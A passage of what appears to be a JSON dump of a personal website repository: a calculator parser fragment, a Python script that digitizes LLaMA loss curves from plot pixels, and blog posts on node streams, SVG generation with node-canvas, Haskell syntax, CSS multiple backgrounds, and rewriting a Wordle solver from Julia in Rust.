/^(rootn|dim|atan2|gammaInc|beta|jn|yn|agm|hypot|fmod|remainder|min|max|sqr|sqrt|recSqrt|cbrt|neg|abs|log|ln|log2|log10|log1p|exp|exp2|exp10|expm1|cos|sin|tan|sec|csc|cot|acos|asin|atan|cosh|sinh|tanh|sech|csch|coth|acosh|asinh|atanh|eint|li2|gamma|lngamma|digamma|zeta|erf|erfc|j0|j1|y0|y1|rint|ceil|rintCeil|floor|rintFloor|round|rintRound|rintRoundeven|trunc|rintTrunc|frac)\\b/,\n};\n\nSyntaxTreeNode.operators = [...\"+-*×/÷%^\", \"**\", \"!\"];\nSyntaxTreeNode.operatorAssociativity =\n SyntaxTreeNode.operators.reduce((a, o, i) => a.set(o, i), new Map());\nSyntaxTreeNode.funcFromOperator = {\n '+': \"add\",\n '-': \"sub\",\n '*': \"mul\",\n '×': \"mul\",\n '/': \"div\",\n '÷': \"div\",\n '%': \"remainder\",\n '^': \"pow\",\n '**': \"pow\",\n '!': \"fac\",\n};\n\nclass Evaluator {\n eval(tree) {\n return tree.root.eval();\n }\n}\n\nexport default Calculator;\n"
},
{
"alpha_fraction": 0.5368473529815674,
"alphanum_fraction": 0.587809145450592,
"avg_line_length": 39.43434524536133,
"blob_id": "1db0e162864a354932ffa4dce588f3a38b58ed6e",
"content_id": "401ef47aae610231403c6edbfd599c1a06697035",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4003,
"license_type": "no_license",
"max_line_length": 167,
"num_lines": 99,
"path": "/blog/assets/chinchilla-s-death/llama-data.py",
"repo_name": "espadrine/espadrine.github.com",
"src_encoding": "UTF-8",
"text": "import csv\n\nllama = {}\nversions = ['1', '2']\nllama_models = {\n '1': ['7B', '13B', '33B', '65B'],\n '2': ['7B', '13B', '34B', '70B']\n}\nllama_gpu_hours = {\n '1': {\n '7B': 82432,\n '13B': 135168,\n '33B': 530432,\n '65B': 1022362,\n },\n '2': {\n '7B': 184320,\n '13B': 368640,\n '34B': 1038336,\n '70B': 1720320,\n }\n}\n\nfor version in versions:\n llama[version] = {}\n for model in llama_models[version]:\n llama[version][model] = {}\n # Extracted with `mutool show llama.pdf 108`.\n with open(f\"./data/llama{version}-{model}-pixels.tsv\", 'r') as f:\n reader = csv.reader(f, delimiter='\\t')\n pixels = []\n for row in reader:\n pixels.append([float(row[0]), float(row[1])])\n llama[version][model]['pixels'] = pixels\n llama[version][model]['gpu_hours'] = llama_gpu_hours[version][model]\n\n# Pixel conversion.\nfor version in versions:\n for model in llama_models[version]:\n llama[version][model]['x_pixels'] = [pixel[0] for pixel in llama[version][model]['pixels']]\n llama[version][model]['y_pixels'] = [pixel[1] for pixel in llama[version][model]['pixels']]\n\n# Value = A * pixel + B\n# => A = (last_value - first_value) / (last_pixel - first_pixel)\n# B = last_value - A * last_pixel\ndef linear_coeffs(series, first_value, last_value):\n a = (last_value - first_value) / (series[-1] - series[0])\n b = last_value - a * series[-1]\n return [a, b]\n\n# We use https://apps.automeris.io/wpd/ to estimate the first and last points of the 65B model.\n# Since the first data dot does not appear on the graph, we adjust the Y value\n# to have the end of the 7B training run match.\nllama_plot_coeffs = {\n '1': {\n 'x': linear_coeffs(llama['1']['65B']['x_pixels'], 100, 2000),\n 'y': linear_coeffs(llama['1']['65B']['y_pixels'], 2.25, 1.5572327044025158),\n },\n '2': {\n 'x': linear_coeffs(llama['2']['70B']['x_pixels'], 14.77104874446087, 2000.0),\n 'y': linear_coeffs(llama['2']['70B']['y_pixels'], 2.39, 1.4957264957264955),\n }\n}\n\n# Conversion functions.\ndef llama_gtoken_from_x_pixel(pixel, version):\n return pixel * llama_plot_coeffs[version]['x'][0] + llama_plot_coeffs[version]['x'][1]\n\ndef llama_loss_from_y_pixel(pixel, version):\n return pixel * llama_plot_coeffs[version]['y'][0] + llama_plot_coeffs[version]['y'][1]\n\nfor version in versions:\n for model in llama_models[version]:\n llama[version][model]['gtokens'] = [llama_gtoken_from_x_pixel(x, version) for x in llama[version][model]['x_pixels']]\n llama[version][model]['loss'] = [llama_loss_from_y_pixel(x, version) for x in llama[version][model]['y_pixels']]\nprint(\"First point:\", llama['1']['7B']['gtokens'][0], \"gigatokens with loss\", llama['1']['7B']['loss'][0])\n\n# Time conversion.\ndef gpu_hour_per_gtoken(version, model):\n return llama[version][model]['gpu_hours'] / llama[version][model]['gtokens'][-1]\n\nfor version in versions:\n for model in llama_models[version]:\n hpgt = gpu_hour_per_gtoken(version, model)\n print(f\"Version {version} model {model} cruises at {1e9/hpgt/3600} tokens/second\")\n llama[version][model]['gpu_hour_per_gtoken'] = hpgt\n llama[version][model]['hours'] = [gtokens * hpgt for gtokens in llama[version][model]['gtokens']]\nprint(\"First point:\", llama['1']['7B']['hours'][0], \"hours for\", llama['1']['7B']['gtokens'][0], \"gtokens (\", llama['1']['7B']['gpu_hour_per_gtoken'], \"hour/gtoken )\")\n\n# Write result.\nfor version in versions:\n for model in llama_models[version]:\n with open(f\"./data/llama{version}-{model}.tsv\", \"w\") as f:\n writer = csv.writer(f, delimiter=\"\\t\")\n writer.writerow([\"Hours\", \"Loss\"])\n data = [[llama[version][model]['hours'][i],\n llama[version][model]['loss'][i]]\n for i in range(len(llama[version][model]['hours']))]\n writer.writerows(data)\n"
},
{
"alpha_fraction": 0.6780899167060852,
"alphanum_fraction": 0.6865168809890747,
"avg_line_length": 33.230770111083984,
"blob_id": "c2a3a600f8fb821314e9c355852f5ab3c47ca2ee",
"content_id": "9ca4a6db17826145836ce13ef263ad42e5769f1c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1780,
"license_type": "no_license",
"max_line_length": 183,
"num_lines": 52,
"path": "/blog/src/fs-createreadstream-should-be-re-engineered.md",
"repo_name": "espadrine/espadrine.github.com",
"src_encoding": "UTF-8",
"text": "# `fs.createReadStream` Should Be Re-engineered\n\nI just had a strange WTF moment with node.\n\nTo avoid the state of dismay I went in, just remember this:\n\nIn node, streams have a `on('error', function(err) {})` method which they run when some errors happen.\nUsually, node's default APIs hook a callback to the error, and give you information about this error in the continuation, like so:\n\n fs.readFile(file, function(err, data) { /* you have access to err here */ });\n\nUnfortunately, `fs.createReadStream` doesn't work like that.\nSince there is no listener for the 'error' event on the stream, node crashes loudly, and you cannot try/catch that, because it doesn't happen in the same event loop cycle as the call.\n\n try {\n var stream = fs.createReadStream('./bogus-file');\n } catch (e) {\n // Not caught!\n }\n\nMy advice: if a stream doesn't give you error information, listen to its 'error's.\n\n stream.on('error', function(err) { ... });\n\n----\n\nI caught the issue as I read the source code of `stream.js`.\n\n // don't leave dangling pipes when there are errors.\n function onerror(er) {\n cleanup();\n if (this.listeners('error').length === 0) {\n throw er; // Unhandled stream error in pipe.\n }\n }\n\nIf nothing listens to the 'error' event, it crashes. Obviously, this kind of construct fails to work with try/catch.\n\nAs a result, I wish *all* node API calls used the usual node error handling.\n\n fs.createReadStream(file, function (err) { ... }, options);\n\nWhy wasn't it designed this way originally?\n\nAPIs are hard. At least they're not copyrightable now.\n\n<script type=\"application/ld+json\">\n{ \"@context\": \"http://schema.org\",\n \"@type\": \"BlogPosting\",\n \"datePublished\": \"2012-06-04T14:48:00Z\",\n \"keywords\": \"js\" }\n</script>\n"
},
{
"alpha_fraction": 0.7564727663993835,
"alphanum_fraction": 0.765228271484375,
"avg_line_length": 91.96511840820312,
"blob_id": "1e4ae438179d643b6b8ea4d60b5ddeef1582bb27",
"content_id": "6ada41fc39589635b643c57fc673864d3f8dfe51",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 8009,
"license_type": "no_license",
"max_line_length": 601,
"num_lines": 86,
"path": "/blog/src/canvas-svg.md",
"repo_name": "espadrine/espadrine.github.com",
"src_encoding": "UTF-8",
"text": "# Canvas SVG\n\nThe other night, I was dreaming of colorful lines.\n\nI was racing on this roller-coaster of red, green, blue pathways, occasionally jumping from one platform to the next. It felt like being part of this [acko.net](http://acko.net/) front page. I hurt myself quite a bit and, slowly and surely, ended up coloring everything in red. That's until I fell down into this bright light surrounding me, only to realize that space was circular; falling from the bottom made me land on the top. The sound of my knees breaking made me wake up.\n\n## That is when I realized that an effort I had ongoing had a simple and elegant solution.\n\nYou may know that I made and maintain the <http://shields.io> service. An effort in providing badges for use in GitHub and elsewhere, this website promotes the use of SVG as a means to diminish bandwidth costs for images and solve the zoom / retina / [4x](http://fremycompany.com/BG/2013/Why-Super-Retina-screens-are-worthwhile-172/) / `<picture>` problem that so many web developers are losing hair on. You see, images are either photos, textures, or icons / banners / logos / badges / all this ilk.\n\n- For photos: use JPEG / WebP with `<picture>` and store a 4x version of it.\n- For textures: WebGL is your friend.\n- For the rest: use SVG.\n\nThe neat outcome of this categorization is that, as we go towards an animated world where even newspaper pictures are [ambiance loops](http://www.nytimes.com/newsgraphics/2013/10/27/south-china-sea/) straight from a Harry Potter book, or [astonishing video interviews](http://www.theguardian.com/world/interactive/2013/nov/01/snowden-nsa-files-surveillance-revelations-decoded) that deliver immediate context to the article… with seamless looping scenes algorithms [already there](http://research.microsoft.com/en-us/um/people/hoppe/proj/videoloops/)… the progressive solutions are thankfully obvious.\n\n- WebP becomes WebM. (*Please, web devs, take a page from [moot's book](http://blog.4chan.org/post/81896300203/webm-support-on-4chan) and no less than the great Vine service, don't use wasteful gifs or looping WebP!*)\n- WebGL is already built for interactivity.\n- SVG has animations, but, more importantly, it shares the same DOM that we can JSify.\n\n## But I digress.\n\nThe issue that has itched me as I provided those badges was fonts. I could not freely choose them. Either bundling a font in the image would make it weigh *way too much*, or subsetting the font dynamically would take *way too much time*. The only thing I had was to hide behind **web-safe fonts**, and compute the probability that the badge would have just the right width, and the text would look just about right for users to have no idea.\n\nI am serious, by the way, about computing the probabilities. Look at [this issue on GitHub](https://github.com/badges/gh-badges/issues/14). Scroll. Keep scrolling.\n\nHow can we get away from this? In general, how can we use many different fonts on many different images?\n\nYou may not have noticed this by looking at the <http://shields.io> website: [the logo](http://shields.io/logo.svg) is made of [OpenSans](http://en.wikipedia.org/wiki/Open_Sans) text. Whenever we can precompute a subsetted font, we should, and that is what I did: a font that contains only the letters S, h, i, e, l, d, s, I and O. No duplicate letters; this is a worst-case. The logo weighs 8.6KB, and it's all SVG.\n\nHow do you do it? Use SIL's [ttfsubset](http://scripts.sil.org/cms/scripts/page.php?site_id=nrsi&id=fontutils#fb138857) (it is brilliantly useful, despite its flawed installation process—I actually had a bit of a struggle to make it work [back in January](http://scripts.sil.org/svn-public/utilities/Font-TTF-scripts/trunk/Changes) but I fixed it).\n\n $ cat glyphs-logo\n S h i e l d s I O\n $ ttfsubset -n OpenSans -g glyphs-logo OpenSans.woff OpenSans-icon-subset.woff\n $ node -p 'var fs = require(\"fs\"); fs.writeFileSync(\"OpenSans-icon-subset.woff.base64\", fs.readFileSync(\"OpenSans-icon-subset.woff\", \"base64\"));'\n\nNonetheless, as I said before, I cannot use this trick for all my badges, since the computation would be too expensive.\n\n## The Age Of Batik\n\nAnother option was to target a specific font, convert it to SVG paths stored in one obese JSON, and compute the position of each letter with respect to each other. Every letter would then be a distinct SVG path, and our obese JSON would contain kerning information so that we can avoid designers having their eyes bleed.\n\nThere already exists a converter from TTF to SVG fonts called [Batik](http://xmlgraphics.apache.org/batik/tools/font-converter.html). We then could [parse](https://github.com/Leonidas-from-XIV/node-xml2js) the XML, extract all the path description attributes, compile them into JSON.\n\nHowever, SVG fonts are a bit weird. The paths are upside-down, so that I'd have to parse each path, recompute all the dots by mirroring them along an axis I would have to find, and scale them to our intended font size.\n\nThen, for every letter I type in, I would have to keep track of the horizontal position, look for the path description, subtract the kerning information, add a `<path>` element to the badge, move my horizontal ruler, and get ready for the next letter.\n\nThis process was sufficiently complicated that I got stuck between the mirroring computation and the storage of kerning information. It was taking more time than I wanted, as well.\n\n## The Dawn Of Node-Canvas\n\nDawn? How poetic. Yet, it is true that I found a simpler solution while rising from a colorful dream along with a colorful sun, getting ready to go work on making it easier to [sell train tickets](https://www.capitainetrain.com/).\n\nI was already using [**node-canvas**](https://github.com/Automattic/node-canvas). This server-side implementation of HTML's [Canvas API](http://www.whatwg.org/specs/web-apps/current-work/multipage/the-canvas-element.html#canvasrenderingcontext2d) helps me compute the width of a badge's text in a particular font, so that each badge is produced with the correct width.\n\nI had in the past dabbled with [Cairo](http://cairographics.org/), the amazingly modular graphics engine used in Linux' Gnome environment, Mozilla's Firefox browser, WebKit's GTK+ port, Inkscape and Gnuplot. I won't admit that I first played with Cairo through [Why the Lucky Stiff's Shoes library](http://shoesrb.com/).\n\nCairo is also what powers node-canvas.\n\nCairo is splendid because it has a clear separation between **what** you want to draw and **where** you want to draw it. You only need to flip one code line to have something you draw be on the screen, on a PNG image, on a PDF…\n\n… or on an SVG image.\n\nAll I needed was to [add the bindings](https://github.com/Automattic/node-canvas/pull/465) for it in node-canvas!\n\nSuddenly, thanks to this patch, I can:\n\n- Get SVG paths from text of a specific font (instead of resorting to web-safe fonts),\n- Generate customized SVG images server-side, which saves more bandwidth the larger the image and doesn't have that zooming / retina / 2x / `<picture>` issue,\n- Compute SVG images to be inserted in the middle of an HTML page, which makes it part of the DOM and can be animated by a nearby script.\nThink of subtle animated random background images or pre-generated real-time graphs!\n\nIt isn't merged yet, but I am already excited!\n\n## Afterword\n\nThis was going to be part of a talk I wanted to make at JSConf. Unfortunately, I was not selected as a speaker. There are many more things I wanted to cover — the history of those GitHub badges you see everywhere, the technology used to make each badge, to support both SVG, PNG and the like with exactly the same rendering, some nitty-gritty about caching and the story of our interaction with all those services we support… Maybe another blog post, another time?\n\n<script type=\"application/ld+json\">\n{ \"@context\": \"http://schema.org\",\n \"@type\": \"BlogPosting\",\n \"datePublished\": \"2014-08-30T13:35:00Z\",\n \"keywords\": \"svg, canvas\" }\n</script>\n"
},
{
"alpha_fraction": 0.7352876663208008,
"alphanum_fraction": 0.7383504509925842,
"avg_line_length": 73.9344253540039,
"blob_id": "a5deb05be7acadcef79b68cfb6386e3c47d36814",
"content_id": "97851d712868fdd44247ef69109e8154914d3c01",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 4581,
"license_type": "no_license",
"max_line_length": 567,
"num_lines": 61,
"path": "/blog/src/rant-about-haskell.md",
"repo_name": "espadrine/espadrine.github.com",
"src_encoding": "UTF-8",
"text": "# Rant About Haskell\n\nI will fall in the typical hole of \"programmers that played with a language and believe they know why that language is bad\".\n\nHowever, I actually think a lot of things about Haskell are outstanding, starting with its well-designed type system, going on with its healthy library and ending with its excellent set of tools.\n\nWhat makes Haskell bad in my opinion is threefold:\n\n- The syntax is awkward,\n- Tracking state is made difficult,\n- The bricks of the language (ie, the type system) make it hard to build designs that are easy to grasp.\n\nNumber three relates to how its grandiose type system makes you end up with many types that use parametric polymorphism, and you must go through the hassle of understanding how each parameter is used in each function call and in each function definition. Add typeclasses to that, and understanding all this becomes even harder.\n\nNumber two, tracking state, actually stems from Number three. State is designed to work through monads, which are a complex structure that relies on both typeclasses and parametric polymorphism, which means understanding how a specific state type works is made hard.\n\nI don't want to delve too deep into why understanding those things is hard when you read code that was not authored by you, because that requires explaining some example code, which would be difficult precisely for the reason I give, and it would be really frustrating for you reader.\n\nNow, I'll tackle syntax, which is far nicer to poke fun at. The original reason people fear language with significant whitespace is that it is really easy, as a language designer, to get wrong. Python certainly did get it right, but Haskell failed. Let me show you an example of Haskell code that made me struggle to get right:\n\n expandRow :: Row Choice -> [Row Choice]\n expandRow r = expandRowAcc r []\n where expandRowAcc (x:xs) lead = if (multipleChoice x)\n then -- The pivot is x.\n [lead ++ [[d]] ++ xs | d [Row Choice]\n expandRow r = expandRowAcc r [] where\n expandRowAcc (x:xs) lead = if (multipleChoice x)\n then -- The pivot is x.\n [lead ++ [[d]] ++ xs | d <- x]\n else -- The pivot is in xs.\n expandRowAcc xs (lead ++ [x])\n\nThat is obviously invalid Haskell, right? The where keyword should be at the end of the previous line, like so:\n\n expandRow :: Row Choice -> [Row Choice]\n expandRow r = expandRowAcc r [] where\n expandRowAcc (x:xs) lead = if (multipleChoice x)\n then -- The pivot is x.\n [lead ++ [[d]] ++ xs | d <- x]\n else -- The pivot is in xs.\n expandRowAcc xs (lead ++ [x])\n\nOn the other hand, this is obviously valid Haskell, even though the where is at the start of a line:\n\n expandRow r = expandRowAcc r []\n where expandRowAcc (x:xs) lead = if (multipleChoice x) then [lead ++ [[d]] ++ xs | d <- x] else expandRowAcc xs (lead ++ [x])\n\nThere are many other things that make the syntax awkward, inconsistency such as defining a function normally (optionally with a `case…of`), with a series of clauses, and with guards (each have fundamentally distinct syntax, making the use of two of them impossible in lambda expressions). Some things are made very hard, such as knowing the precedence and therefore when to put a parenthesis. (I end up putting parentheses everywhere, because every time I see an obscure type error, I don’t want to fight with the angst that it might be caused by a precedence error.)\n\nAnother example of awkward syntax appears in one of Haskell’s most adorable features, currying. Currying makes the order of the parameters of the function you make matter a lot. You should make it so that the last argument, when removed, makes the curried function be useful. However, using infix notation, the first argument can also be removed for currying. You’re out of luck for all other arguments.\n\nOverall, all of Haskell’s pros make code really easy to write, but its cons make code quite hard to read and maintain. Touching something already authored requires a lot of thought into how every piece fits together, and it can still break things in a way that is both predictable and logical, assuming you know Haskell better than your own mother tongue.\n\nI see Haskell as an amazing project to steer interest in language design, but I am a bigger fan of its offsprings than I am of Haskell itself.\n\n<script type=\"application/ld+json\">\n{ \"@context\": \"http://schema.org\",\n \"@type\": \"BlogPosting\",\n \"datePublished\": \"2014-07-17T14:09:00Z\",\n \"keywords\": \"haskell\" }\n</script>\n"
},
{
"alpha_fraction": 0.7141956090927124,
"alphanum_fraction": 0.7205047607421875,
"avg_line_length": 53.655174255371094,
"blob_id": "6ec139be19f169cb23836a995602d7de79266af9",
"content_id": "6e3708127fb26777b27e3230e487acf19543fbfa",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 4757,
"license_type": "no_license",
"max_line_length": 447,
"num_lines": 87,
"path": "/blog/src/css-variables-vs-multiple-background-images.md",
"repo_name": "espadrine/espadrine.github.com",
"src_encoding": "UTF-8",
"text": "# CSS Variables vs. Multiple Background Images\n\nI was working on [Tree](https://github.com/garden/tree) today. While in the process of adding file selection, I realized I was duplicating a lot of code for no good reason but the limitations of CSS3.\n\nTree is a collaborative file system. As such, it needs a file explorer. So far, that file explorer, dubbed Gateway, lacks the UI to delete files. Since there are many operations that work on one or more files, I needed to create a system to select multiple files. As it stands, files currently have a number of backgrounds: one image to indicate what type of file it is, and a background color to show which file is currently focused.\n\nSo far, that hasn't caused any issue, since for some reason, setting the background color and a background image isn't considered a multiple background. However, adding another background image to indicate that the file is selected, and another to hint, while hovering over a file, that you can click it to select it, forces it to go into multiple-background mode, and that distinction is no longer valid. As a result, I now have four backgrounds.\n\nOne part of the issue is that those backgrounds are either present or absent on any particular file. The other part is that when you change a multiple background, you have to include all the different backgrounds at the same time, so that the CSS engine can figure out the depth order between them from the order they have in the comma notation.\n\n(For the sake of readability, I am only writing `bgfile` instead of a long background image declaration.)\n\n #filelist li.file {\n background: bgfile;\n }\n #filelist li.file.focus {\n background: bgfile, bgfocus;\n }\n #filelist li.file.selected.focus {\n background: bgfile, bgselected, bgfocus;\n }\n #filelist li.file.selected {\n background: bgfile, bgselected;\n }\n \n /* And all over again for folders… */\n #filelist li.folder {\n background: bgfolder;\n }\n /* etc. */\n\nIt should be clear by now that, given `n` different backgrounds, we have to write `2^n` different rules, and copy the very same background image `n` times, causing a huge duplication of code! Not to mention related properties such as `background-position`, `background-size`, `background-repeat`, `background-origin` and `background-attachment`!\n\nA (hopefully) upcoming CSS standard that would solve half of the problem is [CSS variables](http://dev.w3.org/csswg/css-variables/). Thanks to that, there would be no duplication of code, and we would only have to write the background rule once for every background, instead of `n`.\n\n #filelist {\n var-bgfile: bgfile;\n var-bgfolder: bgfolder;\n var-bgfocus: bgfocus;\n var-bgselected: bgselected;\n }\n \n #filelist li.file {\n background: var(bgfile);\n }\n #filelist li.file.focus {\n background: var(bgfile), var(bgfocus);\n }\n #filelist li.file.selected.focus {\n background: var(bgfile), var(bgselected), var(bgfocus);\n }\n #filelist li.file.selected {\n background: var(bgfile), var(bgselected);\n }\n /* etc. */\n\nHowever, the example above has only `2^3 = 8` rules, but in order to add a visual hint upon hover that you can select a file, I should actually write `2^4 = 16` rules! And that exponentially increasing number of rules isn't solved by using CSS variables.\n\nFundamentally, the issue with it is that you cannot make partial background declarations. What would we need to make it happen? Introduce a z-index to backgrounds.\n\n partial-background: <bg-z-index> , <bg-image> || <position> [ / <bg-size> ]? || <repeat-style> || <attachment> || <box>{1,2}\n\nAnd then I would have:\n\n #filelist li.file {\n partial-background: 3, bgfile;\n }\n #filelist li.folder {\n partial-background: 3, bgfolder;\n }\n #filelist li.selected {\n partial-background: 2, bgselected;\n }\n #filelist li.focus {\n partial-background: 1, bgfocus;\n }\n\nPartial backgrounds only mix together: a normal background image declaration clears all partial backgrounds currently on, and plays by its own rules. However, partial backgrounds should work with `background-color`.\n\nI don't have a strong opinion of what should happen when two z-index collide. One declaration could overwrite the other, or the behaviour could be undefined. In my case, we can't really have a file be a folder or vice-versa, and in general, having collisions should only happen by mistake. </box></attachment></repeat-style></bg-size></position></bg-image></bg-z-index>\n\n<script type=\"application/ld+json\">\n{ \"@context\": \"http://schema.org\",\n \"@type\": \"BlogPosting\",\n \"datePublished\": \"2013-11-25T20:33:00Z\",\n \"keywords\": \"css\" }\n</script>\n"
},
{
"alpha_fraction": 0.7422152757644653,
"alphanum_fraction": 0.7658306956291199,
"avg_line_length": 38.70954513549805,
"blob_id": "f781fface0f5ebb036afdee5516e37b7a5ad36cd",
"content_id": "131ad190eea9d764ba513815adaf7afd28bc6360",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 9592,
"license_type": "no_license",
"max_line_length": 128,
"num_lines": 241,
"path": "/blog/src/sometimes-rewriting-in-another-language-works.md",
"repo_name": "espadrine/espadrine.github.com",
"src_encoding": "UTF-8",
"text": "# Sometimes, rewriting in another language works\n\n<style>\n.wordleSolver {\n width: 90%;\n margin: auto;\n padding: .6em 2em;\n border: 1px solid lightgray;\n border-radius: 50px;\n background-color: #fafaff;\n}\n.wordleSolver p {\n text-align: center;\n}\n.wordleSolver input {\n width: 7ex;\n}\noutput { word-break: break-all; }\n</style>\n<div class=wordleSolver>\n <section id=\"logParagraph\"></section>\n <form action=\"javascript:void 0\">\n <p><label> Guess: <input id=\"guessInput\" placeholder=\"salet\" autocomplete=\"off\"></label>\n <label> Constraint: <input id=\"constraintInput\" placeholder=\"ox...\" autocomplete=\"off\"></label>\n </p>\n <p>\n <button id=\"guessButton\">Guess</button>\n <button id=\"restartButton\">Restart</button>\n <span id=\"computingParagraph\">Computing…</span>\n <p>\n </form>\n <p> The constraint should be 5 characters:<br>\n o = letter at right spot, x = wrong spot, . = not in the word.</p>\n <script src=\"../assets/sometimes-rewriting-in-another-language-works/main.js\"></script>\n</div>\n\nThis month, the game of [Wordle][] has exploded in popularity.\n\n\n\nThe principle is simple: every day, a secret 5-letter word must be guessed\nby everyone on the planet from the comfort of their confinement.\nWe each have 6 guesses: every time we make one,\nthe website lists all **correctly positioned letters**,\nall **incorrectly positioned ones**,\nand the letters that are **not in the solution**.\n\n## Strategy\n\nPlaying the game, there are many strategies you quickly pick up.\n\n1. English letter frequencies help choose guesses that divide the search space faster.\n2. You can make guesses that don’t follow previously reveiled constraints:\n a completely different guess can narrow down the possibilities much more.\n3. Using common vowels on the first guess and common consonants on the second,\n helps narrow down possibilities very fast.\n\nMany [bloggers][blog1] have [tried][blog2] their [hand][blog3] at\n[optimal][blog4] strategies.\nAt the time, While skimming through them, it felt like each approach had issues.\nThat motivated me to add to the pile of suboptimal techniques with my own,\nhopefully less flawed, algorithm.\n\n## Principles\n\nI like to start tackling optimality problems by *betting on brute force*.\nIt sometimes works right off the bat,\nand when it does not, I learn a lot from it on what to improve.\n\nMany players focus on letter frequency, but while it can feel like brute force,\nit does not brute-force the right solution.\nIndeed, the guess with the most likely letters does not segment the search\nspace fairly. A lot of words have the most likely letters, after all.\n\nOne (admittedly suboptimal, but superior) target,\nis to take the list of possible solutions, and find the guess which, on average,\nreduces the search space the most, by eliminating the most candidate words.\n\nThis is where we get our hands dirty with the nitty-gritty details.\n\nThere are two different lists in the JS code of the game’s webpage.\n\n1. One contains the **2315** potential solutions,\n2. and the other contains **10657** other words that will never be solutions,\n but that can still be used as guesses. Red herrings, if you will.\n\nYou may think the red herrings are useless, but in fact,\nthey can achieve a greater elimination rate.\n\nSo, the algorithm needs to loop over all guesses.\n\nFor each one, it must compute the number of eliminated solutions,\nfor each possible solution.\n\nTo do that, it must loop over all possible solutions,\ncompute the constraint information that Wordle would produce for that guess,\nand then loop over all possible solutions again\nto count how many those would reject.\n\nThere are five letters in each guess, producing five constraints to check,\nand some constraints require looping over all letters of the solution.\n\nOverall, the number of operations is (10657+2315) × 2315 × 2315 × 5 × 5.\nThat is 1,737,996,667,500 steps.\n\nThat number is in that weird range of brute-force expectations:\n*it is not unreachable, but it is not trivial either*.\nConverting to nanoseconds, it is about half an hour;\nbut we can just feel our gut yelling\nthat each operation will take a bit more than a nanosecond.\n\n## Optimism is healthy, right?\n\nOff I went, candidly [implementing the algorithm][jlimpl] in [Julia][Julia].\n\n(I like Julia for its type system and extensive standard library,\nwhich makes it my go-to desk calculator.\nIt also [cares about performance][jlperf],\nrelying on an LLVM-based JIT compiler.)\n\nSince I knew I was in for a long compute time,\nI added a fancy duration estimator based on the average time the top loop took.\n\nSadly, this is what I saw:\n\n $ julia play-optimally.jl\n Ranking guesses... 1/12972 words (24950 min left)\n\nHang on, that is not half an hour… It is closer to 17 days!\n\nAt that point, I really had three options:\n\n1. Optimizing,\n2. Parallelizing,\n3. Rewriting in a faster language.\n\n## Pessimism is healthy, too\n\nI felt I could rewrite it in Rust within two hours.\nMy mental model of how the compiled assembly should be,\nmade me believe that Julia’s compiler was doing something wrong,\nand that Rust would indeed be much faster.\n\nHowever, I had no certainty, and a common maxim states that rewriting is usually\nless fruitful than redesigning with better algorithms.\n\nParallelizing was another option, but I did not jump with joy at the idea of\nbringing my laptop to its knees by squeezing each of my 8 threads for…\nlet me calculate… upwards of 50 continuous hours, at best?!\n\nSo I made a compromise:\n*I would spend 2 hours trying to fight the Julia compiler and figure out how to\nget it going fast*.\n\nBut the volume of possible compiler bailouts is large,\nand the sweet spot of JIT performance is a needle in a haystack.\n\nReader, you know where the story is going:\nthose two hours were fruitless,\nand the next two successfully [rewrote it all in Rust][rsimpl].\n\n $ time cargo run\n Ranking guesses... 11/12972 words (441 min left)\n\nAnd just like that, I was granted the best Wordle guess in 7h,\n15% of the time that parallelizing Julia would have given me.\n\n*(Edit: using `time cargo run --release`\neven brings it all the way down to 30 minutes!)*\n\n*(Edit 2: [a Julia thread investigated the code][jlthread].\nA big part of the time difference came from a mistake in the Julia code,\nwhich caused the algorithm to search through all possible guesses\nas potential solutions, instead of only the accepted solutions.\nThat brings it down to about 4h on the same machine.*\n\n*The other improvements which allow Julia to match Rust performance involve\nusing byte arrays instead of strings,\nusing integer types with a fixed number of bits,\nand avoiding non-constant globals.*\n\n*Along with [a few other fascinating tricks][jlpr] that I recommend you read,\n**the Julia version takes a stunning 22 minutes**,\nbetter than the simple Rust version (which, to be fair,\ncan likely achieve it too with similar tricks.))*\n\n## A warning on what the moral is\n\nSure, the main conclusion is this:\n\n> Sometimes, rewriting in a more suitable language will get you the answer\n> faster than any time spent on optimization or parallelization can give you.\n\n*(Edit: and, as someone from the Julia thread puts it,\nsometimes you might not make the same bug in both implementations!)*\n\nHad I rewritten the code directly\ninstead of spending two hours vainly optimizing Julia code,\nI would have got the answer two hours earlier.\n\nBut more importantly, this is not about the language itself.\nIt is about the quality of the compiler’s optimizers.\nRewriting it in JS would have given a similar speedup.\n\nJulia has outstanding qualities, and it can be fast.\nIt just has not had the sheer magnitude of optimizational grind\nthat V8 and Rust have accumulated over the years.\n\nAnd in case you were hoping to know why I called this algorithm suboptimal:\nconsider that a first guess could leave only 5 possible solutions\nwhich all next guesses would narrow down to 2;\nwhilst a better first guess could leave 6 possible solutions\nwhich the next guesses narrow down to 1.\n\n[Algorithms do matter in the end too.][optimal-blog]\n\n—\n\n[Reddit comments here.](https://www.reddit.com/r/programming/comments/se16m0/sometimes_rewriting_in_another_language_works/)\n[HN comments here.](https://news.ycombinator.com/item?id=30101862)\n[Other comments here.](https://www.reddit.com/r/espadrine/comments/se187i/sometimes_rewriting_in_another_language_works/)\n\n[Wordle]: https://www.powerlanguage.co.uk/wordle/\n[blog1]: https://typon.github.io/wordle.html\n[blog2]: https://slc.is/#Best%20Wordle%20Strategy%20%E2%80%94%20Explore%20or%20Exploit\n[blog3]: https://bert.org/2021/11/24/the-best-starting-word-in-wordle/\n[blog4]: https://github.com/jakearchibald/wordle-analyzer/\n[jlimpl]: https://github.com/espadrine/optimal-wordle/blob/2e71cb4ca461ded5111a001ceb398ec2f4b08494/play-optimally.jl\n[Julia]: https://julialang.org/\n[jlperf]: https://julialang.org/benchmarks/\n[rsimpl]: https://github.com/espadrine/optimal-wordle/blob/934dffd9781b6067b6de7b0f136a519867570fa3/src/main.rs\n[optimal-blog]: https://sonorouschocolate.com/notes/index.php?title=The_best_strategies_for_Wordle\n[jlthread]: https://discourse.julialang.org/t/rust-julia-comparison-post/75403/16?u=kristoffer.carlsson\n[jlpr]: https://github.com/espadrine/optimal-wordle/pull/1\n\n<script type=\"application/ld+json\">\n{ \"@context\": \"http://schema.org\",\n \"@type\": \"BlogPosting\",\n 